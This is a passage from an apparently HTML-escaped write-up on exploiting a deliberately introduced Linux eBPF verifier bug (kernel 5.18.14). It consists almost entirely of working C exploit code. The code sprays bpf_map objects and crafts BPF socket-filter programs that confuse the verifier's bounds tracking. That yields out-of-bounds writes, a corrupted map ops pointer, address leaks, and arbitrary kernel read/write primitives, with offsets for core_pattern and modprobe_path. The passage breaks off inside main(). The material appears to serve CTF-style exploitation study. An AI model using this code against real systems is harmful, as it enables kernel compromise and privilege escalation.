      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
